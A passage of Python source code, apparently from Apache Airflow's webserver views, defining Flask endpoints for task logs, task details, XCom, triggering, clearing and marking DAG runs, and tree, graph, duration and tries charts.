'LOG_FILENAME_TEMPLATE')\n attachment_filename = render_log_filename(\n ti=ti,\n try_number=\"all\" if try_number is None else try_number,\n filename_template=filename_template)\n metadata['download_logs'] = True\n\n def _generate_log_stream(try_number, metadata):\n if try_number is None and ti is not None:\n next_try = ti.next_try_number\n try_numbers = list(range(1, next_try))\n else:\n try_numbers = [try_number]\n for try_number in try_numbers:\n metadata.pop('end_of_log', None)\n metadata.pop('max_offset', None)\n metadata.pop('offset', None)\n while 'end_of_log' not in metadata or not metadata['end_of_log']:\n logs, metadata = _get_logs_with_metadata(try_number, metadata)\n yield \"\\n\".join(logs) + \"\\n\"\n return Response(_generate_log_stream(try_number, metadata),\n mimetype=\"text/plain\",\n headers={\"Content-Disposition\": \"attachment; filename={}\".format(\n attachment_filename)})\n except AttributeError as e:\n error_message = [\"Task log handler {} does not support read logs.\\n{}\\n\"\n .format(task_log_reader, str(e))]\n metadata['end_of_log'] = True\n return jsonify(message=error_message, error=True, metadata=metadata)\n\n @expose('/log')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n @provide_session\n def log(self, session=None):\n dag_id = request.args.get('dag_id')\n task_id = request.args.get('task_id')\n execution_date = request.args.get('execution_date')\n dttm = timezone.parse(execution_date)\n form = DateTimeForm(data={'execution_date': dttm})\n dag_model = DagModel.get_dagmodel(dag_id)\n\n ti = session.query(models.TaskInstance).filter(\n models.TaskInstance.dag_id == dag_id,\n models.TaskInstance.task_id == task_id,\n models.TaskInstance.execution_date == dttm).first()\n\n num_logs = 0\n if ti is not None:\n num_logs = ti.next_try_number - 1\n if ti.state == State.UP_FOR_RESCHEDULE:\n # Tasks in reschedule state decremented the try number\n num_logs += 1\n logs = [''] * num_logs\n root = request.args.get('root', '')\n return self.render_template(\n 'airflow/ti_log.html',\n logs=logs, dag=dag_model, title=\"Log by attempts\",\n dag_id=dag_id, task_id=task_id,\n execution_date=execution_date, form=form,\n root=root, wrapped=conf.getboolean('webserver', 'default_wrap'))\n\n @expose('/elasticsearch')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n def elasticsearch(self):\n dag_id = request.args.get('dag_id')\n task_id = request.args.get('task_id')\n execution_date = request.args.get('execution_date')\n try_number = request.args.get('try_number', 1)\n elasticsearch_frontend = conf.get('elasticsearch', 'frontend')\n log_id_template = conf.get('elasticsearch', 'log_id_template')\n log_id = log_id_template.format(\n dag_id=dag_id, task_id=task_id,\n execution_date=execution_date, try_number=try_number)\n url = 'https://' + elasticsearch_frontend.format(log_id=quote(log_id))\n return redirect(url)\n\n @expose('/task')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n def task(self):\n TI = models.TaskInstance\n\n dag_id = request.args.get('dag_id')\n task_id = request.args.get('task_id')\n # Carrying execution_date through, even though it's irrelevant for\n # this context\n execution_date = request.args.get('execution_date')\n dttm = timezone.parse(execution_date)\n form = DateTimeForm(data={'execution_date': dttm})\n root = request.args.get('root', '')\n dag = dagbag.get_dag(dag_id)\n\n if not dag or task_id not in dag.task_ids:\n flash(\n \"Task [{}.{}] doesn't seem to exist\"\n \" at the moment\".format(dag_id, task_id),\n \"error\")\n return redirect(url_for('Airflow.index'))\n task = copy.copy(dag.get_task(task_id))\n task.resolve_template_files()\n ti = TI(task=task, execution_date=dttm)\n ti.refresh_from_db()\n\n ti_attrs = []\n for attr_name in dir(ti):\n if not attr_name.startswith('_'):\n attr = getattr(ti, attr_name)\n if type(attr) != type(self.task): # noqa\n ti_attrs.append((attr_name, str(attr)))\n\n task_attrs = []\n for attr_name in dir(task):\n if not attr_name.startswith('_'):\n attr = getattr(task, attr_name)\n if type(attr) != type(self.task) and \\\n attr_name not in wwwutils.get_attr_renderer(): # noqa\n task_attrs.append((attr_name, str(attr)))\n\n # Color coding the special attributes that are code\n special_attrs_rendered = {}\n for attr_name in wwwutils.get_attr_renderer():\n if hasattr(task, attr_name):\n source = getattr(task, attr_name)\n special_attrs_rendered[attr_name] = \\\n wwwutils.get_attr_renderer()[attr_name](source)\n\n no_failed_deps_result = [(\n \"Unknown\",\n \"All dependencies are met but the task instance is not running. In most \"\n \"cases this just means that the task will probably be scheduled soon \"\n \"unless:
    \\n- The scheduler is down or under heavy load
    \\n{}\\n\"\n \"
    \\nIf this task instance does not start soon please contact your \"\n \"Airflow administrator for assistance.\".format(\n \"- This task instance already ran and had it's state changed manually \"\n \"(e.g. cleared in the UI)
    \" if ti.state == State.NONE else \"\"))]\n\n # Use the scheduler's context to figure out which dependencies are not met\n dep_context = DepContext(SCHEDULER_QUEUED_DEPS)\n failed_dep_reasons = [(dep.dep_name, dep.reason) for dep in\n ti.get_failed_dep_statuses(\n dep_context=dep_context)]\n\n title = \"Task Instance Details\"\n return self.render_template(\n 'airflow/task.html',\n task_attrs=task_attrs,\n ti_attrs=ti_attrs,\n failed_dep_reasons=failed_dep_reasons or no_failed_deps_result,\n task_id=task_id,\n execution_date=execution_date,\n special_attrs_rendered=special_attrs_rendered,\n form=form,\n root=root,\n dag=dag, title=title)\n\n @expose('/xcom')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n @provide_session\n def xcom(self, session=None):\n dag_id = request.args.get('dag_id')\n task_id = request.args.get('task_id')\n # Carrying execution_date through, even though it's irrelevant for\n # this context\n execution_date = request.args.get('execution_date')\n dttm = timezone.parse(execution_date)\n form = DateTimeForm(data={'execution_date': dttm})\n root = request.args.get('root', '')\n dm_db = models.DagModel\n ti_db = models.TaskInstance\n dag = session.query(dm_db).filter(dm_db.dag_id == dag_id).first()\n ti = session.query(ti_db).filter(ti_db.dag_id == dag_id and ti_db.task_id == task_id).first()\n\n if not ti:\n flash(\n \"Task [{}.{}] doesn't seem to exist\"\n \" at the moment\".format(dag_id, task_id),\n \"error\")\n return redirect(url_for('Airflow.index'))\n\n xcomlist = session.query(XCom).filter(\n XCom.dag_id == dag_id, XCom.task_id == task_id,\n XCom.execution_date == dttm).all()\n\n attributes = []\n for xcom in xcomlist:\n if not xcom.key.startswith('_'):\n attributes.append((xcom.key, xcom.value))\n\n title = \"XCom\"\n return self.render_template(\n 'airflow/xcom.html',\n attributes=attributes,\n task_id=task_id,\n execution_date=execution_date,\n form=form,\n root=root,\n dag=dag, title=title)\n\n @expose('/run', methods=['POST'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n def run(self):\n dag_id = request.form.get('dag_id')\n task_id = request.form.get('task_id')\n origin = request.form.get('origin')\n dag = dagbag.get_dag(dag_id)\n task = dag.get_task(task_id)\n\n execution_date = request.form.get('execution_date')\n execution_date = timezone.parse(execution_date)\n ignore_all_deps = request.form.get('ignore_all_deps') == \"true\"\n ignore_task_deps = request.form.get('ignore_task_deps') == \"true\"\n ignore_ti_state = request.form.get('ignore_ti_state') == \"true\"\n\n executor = ExecutorLoader.get_default_executor()\n valid_celery_config = False\n valid_kubernetes_config = False\n\n try:\n from airflow.executors.celery_executor import CeleryExecutor\n valid_celery_config = isinstance(executor, CeleryExecutor)\n except ImportError:\n pass\n\n try:\n from airflow.executors.kubernetes_executor import KubernetesExecutor\n valid_kubernetes_config = isinstance(executor, KubernetesExecutor)\n except ImportError:\n pass\n\n if not valid_celery_config and not valid_kubernetes_config:\n flash(\"Only works with the Celery or Kubernetes executors, sorry\", \"error\")\n return redirect(origin)\n\n ti = models.TaskInstance(task=task, execution_date=execution_date)\n ti.refresh_from_db()\n\n # Make sure the task instance can be run\n dep_context = DepContext(\n deps=RUNNING_DEPS,\n ignore_all_deps=ignore_all_deps,\n ignore_task_deps=ignore_task_deps,\n ignore_ti_state=ignore_ti_state)\n failed_deps = list(ti.get_failed_dep_statuses(dep_context=dep_context))\n if failed_deps:\n failed_deps_str = \", \".join(\n [\"{}: {}\".format(dep.dep_name, dep.reason) for dep in failed_deps])\n flash(\"Could not queue task instance for execution, dependencies not met: \"\n \"{}\".format(failed_deps_str),\n \"error\")\n return redirect(origin)\n\n executor.start()\n executor.queue_task_instance(\n ti,\n ignore_all_deps=ignore_all_deps,\n ignore_task_deps=ignore_task_deps,\n ignore_ti_state=ignore_ti_state)\n executor.heartbeat()\n flash(\n \"Sent {} to the message queue, \"\n \"it should start any moment now.\".format(ti))\n return redirect(origin)\n\n @expose('/delete', methods=['POST'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n def delete(self):\n from airflow.api.common.experimental import delete_dag\n from airflow.exceptions import DagNotFound, DagFileExists\n\n dag_id = request.values.get('dag_id')\n origin = request.values.get('origin') or url_for('Airflow.index')\n\n try:\n delete_dag.delete_dag(dag_id)\n except DagNotFound:\n flash(\"DAG with id {} not found. Cannot delete\".format(dag_id), 'error')\n return redirect(request.referrer)\n except DagFileExists:\n flash(\"Dag id {} is still in DagBag. \"\n \"Remove the DAG file first.\".format(dag_id),\n 'error')\n return redirect(request.referrer)\n\n flash(\"Deleting DAG with id {}. May take a couple minutes to fully\"\n \" disappear.\".format(dag_id))\n\n # Upon success return to origin.\n return redirect(origin)\n\n @expose('/trigger', methods=['POST', 'GET'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n @provide_session\n def trigger(self, session=None):\n\n dag_id = request.values.get('dag_id')\n origin = request.values.get('origin') or url_for('Airflow.index')\n\n if request.method == 'GET':\n return self.render_template(\n 'airflow/trigger.html',\n dag_id=dag_id,\n origin=origin,\n conf=''\n )\n\n dag_orm = session.query(models.DagModel).filter(models.DagModel.dag_id == dag_id).first()\n if not dag_orm:\n flash(\"Cannot find dag {}\".format(dag_id))\n return redirect(origin)\n\n execution_date = timezone.utcnow()\n run_id = f\"{DagRunType.MANUAL.value}__{execution_date.isoformat()}\"\n\n dr = DagRun.find(dag_id=dag_id, run_id=run_id)\n if dr:\n flash(\"This run_id {} already exists\".format(run_id))\n return redirect(origin)\n\n run_conf = {}\n conf = request.values.get('conf')\n if conf:\n try:\n run_conf = json.loads(conf)\n except json.decoder.JSONDecodeError:\n flash(\"Invalid JSON configuration\", \"error\")\n return self.render_template(\n 'airflow/trigger.html',\n dag_id=dag_id,\n origin=origin,\n conf=conf\n )\n\n dag = dagbag.get_dag(dag_id)\n dag.create_dagrun(\n run_id=run_id,\n execution_date=execution_date,\n state=State.RUNNING,\n conf=run_conf,\n external_trigger=True\n )\n\n flash(\n \"Triggered {}, \"\n \"it should start any moment now.\".format(dag_id))\n return redirect(origin)\n\n def _clear_dag_tis(self, dag, start_date, end_date, origin,\n recursive=False, confirmed=False, only_failed=False):\n from airflow.exceptions import AirflowException\n\n if confirmed:\n count = dag.clear(\n start_date=start_date,\n end_date=end_date,\n include_subdags=recursive,\n include_parentdag=recursive,\n only_failed=only_failed,\n )\n\n flash(\"{0} task instances have been cleared\".format(count))\n return redirect(origin)\n\n try:\n tis = dag.clear(\n start_date=start_date,\n end_date=end_date,\n include_subdags=recursive,\n include_parentdag=recursive,\n only_failed=only_failed,\n dry_run=True,\n )\n except AirflowException as ex:\n flash(str(ex), 'error')\n return redirect(origin)\n\n if not tis:\n flash(\"No task instances to clear\", 'error')\n response = redirect(origin)\n else:\n details = \"\\n\".join([str(t) for t in tis])\n\n response = self.render_template(\n 'airflow/confirm.html',\n message=(\"Here's the list of task instances you are about \"\n \"to clear:\"),\n details=details)\n\n return response\n\n @expose('/clear', methods=['POST'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n def clear(self):\n dag_id = request.form.get('dag_id')\n task_id = request.form.get('task_id')\n origin = request.form.get('origin')\n dag = dagbag.get_dag(dag_id)\n\n execution_date = request.form.get('execution_date')\n execution_date = timezone.parse(execution_date)\n confirmed = request.form.get('confirmed') == \"true\"\n upstream = request.form.get('upstream') == \"true\"\n downstream = request.form.get('downstream') == \"true\"\n future = request.form.get('future') == \"true\"\n past = request.form.get('past') == \"true\"\n recursive = request.form.get('recursive') == \"true\"\n only_failed = request.form.get('only_failed') == \"true\"\n\n dag = dag.sub_dag(\n task_regex=r\"^{0}$\".format(task_id),\n include_downstream=downstream,\n include_upstream=upstream)\n\n end_date = execution_date if not future else None\n start_date = execution_date if not past else None\n\n return self._clear_dag_tis(dag, start_date, end_date, origin,\n recursive=recursive, confirmed=confirmed, only_failed=only_failed)\n\n @expose('/dagrun_clear', methods=['POST'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n def dagrun_clear(self):\n dag_id = request.form.get('dag_id')\n origin = request.form.get('origin')\n execution_date = request.form.get('execution_date')\n confirmed = request.form.get('confirmed') == \"true\"\n\n dag = dagbag.get_dag(dag_id)\n execution_date = timezone.parse(execution_date)\n start_date = execution_date\n end_date = execution_date\n\n return self._clear_dag_tis(dag, start_date, end_date, origin,\n recursive=True, confirmed=confirmed)\n\n @expose('/blocked', methods=['POST'])\n @has_access\n @provide_session\n def blocked(self, session=None):\n allowed_dag_ids = appbuilder.sm.get_accessible_dag_ids()\n\n if 'all_dags' in allowed_dag_ids:\n allowed_dag_ids = [dag_id for dag_id, in session.query(models.DagModel.dag_id)]\n\n # Filter by post parameters\n selected_dag_ids = {\n unquote(dag_id) for dag_id in request.form.getlist('dag_ids') if dag_id\n }\n\n if selected_dag_ids:\n filter_dag_ids = selected_dag_ids.intersection(allowed_dag_ids)\n else:\n filter_dag_ids = allowed_dag_ids\n\n if not filter_dag_ids:\n return wwwutils.json_response([])\n\n DR = models.DagRun\n\n dags = (\n session.query(DR.dag_id, sqla.func.count(DR.id))\n .filter(DR.state == State.RUNNING)\n .filter(DR.dag_id.in_(filter_dag_ids))\n .group_by(DR.dag_id)\n )\n\n payload = []\n for dag_id, active_dag_runs in dags:\n max_active_runs = 0\n dag = dagbag.get_dag(dag_id)\n if dag:\n # TODO: Make max_active_runs a column so we can query for it directly\n max_active_runs = dag.max_active_runs\n payload.append({\n 'dag_id': dag_id,\n 'active_dag_run': active_dag_runs,\n 'max_active_runs': max_active_runs,\n })\n return wwwutils.json_response(payload)\n\n def _mark_dagrun_state_as_failed(self, dag_id, execution_date, confirmed, origin):\n if not execution_date:\n flash('Invalid execution date', 'error')\n return redirect(origin)\n\n execution_date = timezone.parse(execution_date)\n dag = dagbag.get_dag(dag_id)\n\n if not dag:\n flash('Cannot find DAG: {}'.format(dag_id), 'error')\n return redirect(origin)\n\n new_dag_state = set_dag_run_state_to_failed(dag, execution_date, commit=confirmed)\n\n if confirmed:\n flash('Marked failed on {} task instances'.format(len(new_dag_state)))\n return redirect(origin)\n\n else:\n details = '\\n'.join([str(t) for t in new_dag_state])\n\n response = self.render_template(\n 'airflow/confirm.html',\n message=\"Here's the list of task instances you are about to mark as failed\",\n details=details)\n\n return response\n\n def _mark_dagrun_state_as_success(self, dag_id, execution_date, confirmed, origin):\n if not execution_date:\n flash('Invalid execution date', 'error')\n return redirect(origin)\n\n execution_date = timezone.parse(execution_date)\n dag = dagbag.get_dag(dag_id)\n\n if not dag:\n flash('Cannot find DAG: {}'.format(dag_id), 'error')\n return redirect(origin)\n\n new_dag_state = set_dag_run_state_to_success(dag, execution_date,\n commit=confirmed)\n\n if confirmed:\n flash('Marked success on {} task instances'.format(len(new_dag_state)))\n return redirect(origin)\n\n else:\n details = '\\n'.join([str(t) for t in new_dag_state])\n\n response = self.render_template(\n 'airflow/confirm.html',\n message=\"Here's the list of task instances you are about to mark as success\",\n details=details)\n\n return response\n\n @expose('/dagrun_failed', methods=['POST'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n def dagrun_failed(self):\n dag_id = request.form.get('dag_id')\n execution_date = request.form.get('execution_date')\n confirmed = request.form.get('confirmed') == 'true'\n origin = request.form.get('origin')\n return self._mark_dagrun_state_as_failed(dag_id, execution_date,\n confirmed, origin)\n\n @expose('/dagrun_success', methods=['POST'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n def dagrun_success(self):\n dag_id = request.form.get('dag_id')\n execution_date = request.form.get('execution_date')\n confirmed = request.form.get('confirmed') == 'true'\n origin = request.form.get('origin')\n return self._mark_dagrun_state_as_success(dag_id, execution_date,\n confirmed, origin)\n\n def _mark_task_instance_state(self, dag_id, task_id, origin, execution_date,\n confirmed, upstream, downstream,\n future, past, state):\n dag = dagbag.get_dag(dag_id)\n task = dag.get_task(task_id)\n task.dag = dag\n\n latest_execution_date = dag.get_latest_execution_date()\n if not latest_execution_date:\n flash(f\"Cannot make {state}, seem that dag {dag_id} has never run\", \"error\")\n return redirect(origin)\n\n execution_date = timezone.parse(execution_date)\n\n from airflow.api.common.experimental.mark_tasks import set_state\n\n if confirmed:\n altered = set_state(tasks=[task], execution_date=execution_date,\n upstream=upstream, downstream=downstream,\n future=future, past=past, state=state,\n commit=True)\n\n flash(\"Marked {} on {} task instances\".format(state, len(altered)))\n return redirect(origin)\n\n to_be_altered = set_state(tasks=[task], execution_date=execution_date,\n upstream=upstream, downstream=downstream,\n future=future, past=past, state=state,\n commit=False)\n\n details = \"\\n\".join([str(t) for t in to_be_altered])\n\n response = self.render_template(\n \"airflow/confirm.html\",\n message=(\"Here's the list of task instances you are about to mark as {}:\".format(state)),\n details=details)\n\n return response\n\n @expose('/failed', methods=['POST'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n def failed(self):\n dag_id = request.form.get('dag_id')\n task_id = request.form.get('task_id')\n origin = request.form.get('origin')\n execution_date = request.form.get('execution_date')\n\n confirmed = request.form.get('confirmed') == \"true\"\n upstream = request.form.get('failed_upstream') == \"true\"\n downstream = request.form.get('failed_downstream') == \"true\"\n future = request.form.get('failed_future') == \"true\"\n past = request.form.get('failed_past') == \"true\"\n\n return self._mark_task_instance_state(dag_id, task_id, origin, execution_date,\n confirmed, upstream, downstream,\n future, past, State.FAILED)\n\n @expose('/success', methods=['POST'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n def success(self):\n dag_id = request.form.get('dag_id')\n task_id = request.form.get('task_id')\n origin = request.form.get('origin')\n execution_date = request.form.get('execution_date')\n\n confirmed = request.form.get('confirmed') == \"true\"\n upstream = request.form.get('success_upstream') == \"true\"\n downstream = request.form.get('success_downstream') == \"true\"\n future = request.form.get('success_future') == \"true\"\n past = request.form.get('success_past') == \"true\"\n\n return self._mark_task_instance_state(dag_id, task_id, origin, execution_date,\n confirmed, upstream, downstream,\n future, past, State.SUCCESS)\n\n @expose('/tree')\n @has_dag_access(can_dag_read=True)\n @has_access\n @gzipped\n @action_logging\n def tree(self):\n dag_id = request.args.get('dag_id')\n blur = conf.getboolean('webserver', 'demo_mode')\n dag = dagbag.get_dag(dag_id)\n if not dag:\n flash('DAG \"{0}\" seems to be missing from DagBag.'.format(dag_id), \"error\")\n return redirect(url_for('Airflow.index'))\n\n root = request.args.get('root')\n if root:\n dag = dag.sub_dag(\n task_regex=root,\n include_downstream=False,\n include_upstream=True)\n\n base_date = request.args.get('base_date')\n num_runs = request.args.get('num_runs')\n if num_runs:\n num_runs = int(num_runs)\n else:\n num_runs = conf.getint('webserver', 'default_dag_run_display_number')\n\n if base_date:\n base_date = timezone.parse(base_date)\n else:\n base_date = dag.get_latest_execution_date() or timezone.utcnow()\n\n with create_session() as session:\n dag_runs = (\n session.query(DagRun)\n .filter(\n DagRun.dag_id == dag.dag_id,\n DagRun.execution_date <= base_date)\n .order_by(DagRun.execution_date.desc())\n .limit(num_runs)\n .all()\n )\n dag_runs = {\n dr.execution_date: alchemy_to_dict(dr) for dr in dag_runs\n }\n\n dates = sorted(list(dag_runs.keys()))\n max_date = max(dates) if dates else None\n min_date = min(dates) if dates else None\n\n tis = dag.get_task_instances(start_date=min_date, end_date=base_date)\n task_instances: Dict[Tuple[str, datetime], models.TaskInstance] = {}\n for ti in tis:\n task_instances[(ti.task_id, ti.execution_date)] = ti\n\n expanded = set()\n # The default recursion traces every path so that tree view has full\n # expand/collapse functionality. After 5,000 nodes we stop and fall\n # back on a quick DFS search for performance. See PR #320.\n node_count = 0\n node_limit = 5000 / max(1, len(dag.leaves))\n\n def encode_ti(ti: Optional[models.TaskInstance]) -> Optional[List]:\n if not ti:\n return None\n\n # NOTE: order of entry is important here because client JS relies on it for\n # tree node reconstruction. Remember to change JS code in tree.html\n # whenever order is altered.\n data = [\n ti.state,\n ti.try_number,\n None, # start_ts\n None, # duration\n ]\n\n if ti.start_date:\n # round to seconds to reduce payload size\n data[2] = int(ti.start_date.timestamp())\n if ti.duration is not None:\n data[3] = int(ti.duration)\n\n return data\n\n def recurse_nodes(task, visited):\n nonlocal node_count\n node_count += 1\n visited.add(task)\n task_id = task.task_id\n\n node = {\n 'name': task.task_id,\n 'instances': [\n encode_ti(task_instances.get((task_id, d)))\n for d in dates\n ],\n 'num_dep': len(task.downstream_list),\n 'operator': task.task_type,\n 'retries': task.retries,\n 'owner': task.owner,\n 'ui_color': task.ui_color,\n }\n\n if task.downstream_list:\n children = [\n recurse_nodes(t, visited) for t in task.downstream_list\n if node_count < node_limit or t not in visited]\n\n # D3 tree uses children vs _children to define what is\n # expanded or not. The following block makes it such that\n # repeated nodes are collapsed by default.\n if task.task_id not in expanded:\n children_key = 'children'\n expanded.add(task.task_id)\n else:\n children_key = \"_children\"\n node[children_key] = children\n\n if task.depends_on_past:\n node['depends_on_past'] = task.depends_on_past\n if task.start_date:\n # round to seconds to reduce payload size\n node['start_ts'] = int(task.start_date.timestamp())\n if task.end_date:\n # round to seconds to reduce payload size\n node['end_ts'] = int(task.end_date.timestamp())\n if task.extra_links:\n node['extra_links'] = task.extra_links\n return node\n\n data = {\n 'name': '[DAG]',\n 'children': [recurse_nodes(t, set()) for t in dag.roots],\n 'instances': [\n dag_runs.get(d) or {'execution_date': d.isoformat()}\n for d in dates\n ],\n }\n\n form = DateTimeWithNumRunsForm(data={'base_date': max_date,\n 'num_runs': num_runs})\n external_logs = conf.get('elasticsearch', 'frontend')\n\n # avoid spaces to reduce payload size\n data = htmlsafe_json_dumps(data, separators=(',', ':'))\n # escape slashes to avoid JSON parse error in JS\n data = data.replace('\\\\', '\\\\\\\\')\n\n return self.render_template(\n 'airflow/tree.html',\n operators=sorted({op.task_type: op for op in dag.tasks}.values(), key=lambda x: x.task_type),\n root=root,\n form=form,\n dag=dag,\n data=data,\n blur=blur, num_runs=num_runs,\n show_external_logs=bool(external_logs))\n\n @expose('/graph')\n @has_dag_access(can_dag_read=True)\n @has_access\n @gzipped\n @action_logging\n @provide_session\n def graph(self, session=None):\n dag_id = request.args.get('dag_id')\n blur = conf.getboolean('webserver', 'demo_mode')\n dag = dagbag.get_dag(dag_id)\n if not dag:\n flash('DAG \"{0}\" seems to be missing.'.format(dag_id), \"error\")\n return redirect(url_for('Airflow.index'))\n\n root = request.args.get('root')\n if root:\n dag = dag.sub_dag(\n task_regex=root,\n include_upstream=True,\n include_downstream=False)\n\n arrange = request.args.get('arrange', dag.orientation)\n\n nodes = []\n edges = []\n for task in dag.tasks:\n nodes.append({\n 'id': task.task_id,\n 'value': {\n 'label': task.task_id,\n 'labelStyle': \"fill:{0};\".format(task.ui_fgcolor),\n 'style': \"fill:{0};\".format(task.ui_color),\n 'rx': 5,\n 'ry': 5,\n }\n })\n\n def get_downstream(task):\n for t in task.downstream_list:\n edge = {\n 'source_id': task.task_id,\n 'target_id': t.task_id,\n }\n if edge not in edges:\n edges.append(edge)\n get_downstream(t)\n\n for t in dag.roots:\n get_downstream(t)\n\n dt_nr_dr_data = get_date_time_num_runs_dag_runs_form_data(request, session, dag)\n dt_nr_dr_data['arrange'] = arrange\n dttm = dt_nr_dr_data['dttm']\n\n class GraphForm(DateTimeWithNumRunsWithDagRunsForm):\n arrange = SelectField(\"Layout\", choices=(\n ('LR', \"Left->Right\"),\n ('RL', \"Right->Left\"),\n ('TB', \"Top->Bottom\"),\n ('BT', \"Bottom->Top\"),\n ))\n\n form = GraphForm(data=dt_nr_dr_data)\n form.execution_date.choices = dt_nr_dr_data['dr_choices']\n\n task_instances = {\n ti.task_id: alchemy_to_dict(ti)\n for ti in dag.get_task_instances(dttm, dttm)}\n tasks = {\n t.task_id: {\n 'dag_id': t.dag_id,\n 'task_type': t.task_type,\n 'extra_links': t.extra_links,\n }\n for t in dag.tasks}\n if not tasks:\n flash(\"No tasks found\", \"error\")\n session.commit()\n doc_md = markdown.markdown(dag.doc_md) \\\n if hasattr(dag, 'doc_md') and dag.doc_md else ''\n\n external_logs = conf.get('elasticsearch', 'frontend')\n return self.render_template(\n 'airflow/graph.html',\n dag=dag,\n form=form,\n width=request.args.get('width', \"100%\"),\n height=request.args.get('height', \"800\"),\n execution_date=dttm.isoformat(),\n state_token=wwwutils.state_token(dt_nr_dr_data['dr_state']),\n doc_md=doc_md,\n arrange=arrange,\n operators=sorted({op.task_type: op for op in dag.tasks}.values(), key=lambda x: x.task_type),\n blur=blur,\n root=root or '',\n task_instances=task_instances,\n tasks=tasks,\n nodes=nodes,\n edges=edges,\n show_external_logs=bool(external_logs))\n\n @expose('/duration')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n @provide_session\n def duration(self, session=None):\n default_dag_run = conf.getint('webserver', 'default_dag_run_display_number')\n dag_id = request.args.get('dag_id')\n dag = dagbag.get_dag(dag_id)\n base_date = request.args.get('base_date')\n num_runs = request.args.get('num_runs')\n num_runs = int(num_runs) if num_runs else default_dag_run\n\n if dag is None:\n flash('DAG \"{0}\" seems to be missing.'.format(dag_id), \"error\")\n return redirect(url_for('Airflow.index'))\n\n if base_date:\n base_date = timezone.parse(base_date)\n else:\n base_date = dag.get_latest_execution_date() or timezone.utcnow()\n\n dates = dag.date_range(base_date, num=-abs(num_runs))\n min_date = dates[0] if dates else timezone.utc_epoch()\n\n root = request.args.get('root')\n if root:\n dag = dag.sub_dag(\n task_regex=root,\n include_upstream=True,\n include_downstream=False)\n\n chart_height = wwwutils.get_chart_height(dag)\n chart = nvd3.lineChart(\n name=\"lineChart\", x_is_date=True, height=chart_height, width=\"1200\")\n cum_chart = nvd3.lineChart(\n name=\"cumLineChart\", x_is_date=True, height=chart_height, width=\"1200\")\n\n y = defaultdict(list)\n x = defaultdict(list)\n cum_y = defaultdict(list)\n\n tis = dag.get_task_instances(start_date=min_date, end_date=base_date)\n TF = TaskFail\n ti_fails = (\n session.query(TF)\n .filter(TF.dag_id == dag.dag_id,\n TF.execution_date >= min_date,\n TF.execution_date <= base_date,\n TF.task_id.in_([t.task_id for t in dag.tasks]))\n .all() # noqa\n )\n\n fails_totals = defaultdict(int)\n for tf in ti_fails:\n dict_key = (tf.dag_id, tf.task_id, tf.execution_date)\n if tf.duration:\n fails_totals[dict_key] += tf.duration\n\n for ti in tis:\n if ti.duration:\n dttm = wwwutils.epoch(ti.execution_date)\n x[ti.task_id].append(dttm)\n y[ti.task_id].append(float(ti.duration))\n fails_dict_key = (ti.dag_id, ti.task_id, ti.execution_date)\n fails_total = fails_totals[fails_dict_key]\n cum_y[ti.task_id].append(float(ti.duration + fails_total))\n\n # determine the most relevant time unit for the set of task instance\n # durations for the DAG\n y_unit = infer_time_unit([d for t in y.values() for d in t])\n cum_y_unit = infer_time_unit([d for t in cum_y.values() for d in t])\n # update the y Axis on both charts to have the correct time units\n chart.create_y_axis('yAxis', format='.02f', custom_format=False,\n label='Duration ({})'.format(y_unit))\n chart.axislist['yAxis']['axisLabelDistance'] = '-15'\n cum_chart.create_y_axis('yAxis', format='.02f', custom_format=False,\n label='Duration ({})'.format(cum_y_unit))\n cum_chart.axislist['yAxis']['axisLabelDistance'] = '-15'\n\n for task in dag.tasks:\n if x[task.task_id]:\n chart.add_serie(name=task.task_id, x=x[task.task_id],\n y=scale_time_units(y[task.task_id], y_unit))\n cum_chart.add_serie(name=task.task_id, x=x[task.task_id],\n y=scale_time_units(cum_y[task.task_id],\n cum_y_unit))\n\n dates = sorted(list({ti.execution_date for ti in tis}))\n max_date = max([ti.execution_date for ti in tis]) if dates else None\n\n session.commit()\n\n form = DateTimeWithNumRunsForm(data={'base_date': max_date,\n 'num_runs': num_runs})\n chart.buildcontent()\n cum_chart.buildcontent()\n s_index = cum_chart.htmlcontent.rfind('});')\n cum_chart.htmlcontent = (cum_chart.htmlcontent[:s_index] +\n \"$( document ).trigger('chartload')\" +\n cum_chart.htmlcontent[s_index:])\n\n return self.render_template(\n 'airflow/duration_chart.html',\n dag=dag,\n demo_mode=conf.getboolean('webserver', 'demo_mode'),\n root=root,\n form=form,\n chart=chart.htmlcontent,\n cum_chart=cum_chart.htmlcontent\n )\n\n @expose('/tries')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n @provide_session\n def tries(self, session=None):\n default_dag_run = conf.getint('webserver', 'default_dag_run_display_number')\n dag_id = request.args.get('dag_id')\n dag = dagbag.get_dag(dag_id)\n base_date = request.args.get('base_date')\n num_runs = request.args.get('num_runs')\n num_runs = int(num_runs) if num_runs else default_dag_run\n\n if base_date:\n base_date = timezone.parse(base_date)\n else:\n base_date = dag.get_latest_execution_date() or timezone.utcnow()\n\n dates = dag.date_range(base_date, num=-abs(num_runs))\n min_date = dates[0] if dates else timezone.utc_epoch()\n\n root = request.args.get('root')\n if root:\n dag = dag.sub_dag(\n task_regex=root,\n include_upstream=True,\n include_downstream=False)\n\n chart_height = wwwutils.get_chart_height(dag)\n chart = nvd3.lineChart(\n name=\"lineChart\", x_is_date=True, y_axis_format='d', height=chart_height,\n width=\"1200\")\n\n for task in dag.tasks:\n y = []\n x = []\n for ti in task.get_task_instances(start_date=min_date, end_date=base_date):\n dttm = wwwutils.epoch(ti.execution_date)\n x.append(dttm)\n # y value should reflect completed tries to have a 0 baseline.\n y.append(ti.prev_attempted_tries)\n if x:\n chart.add_serie(name=task.task_id, x=x, y=y)\n\n tis = dag.get_task_instances(start_date=min_date, end_date=base_date)\n tries = sorted(list({ti.try_number for ti in tis}))\n max_date = max([ti.execution_date for ti in 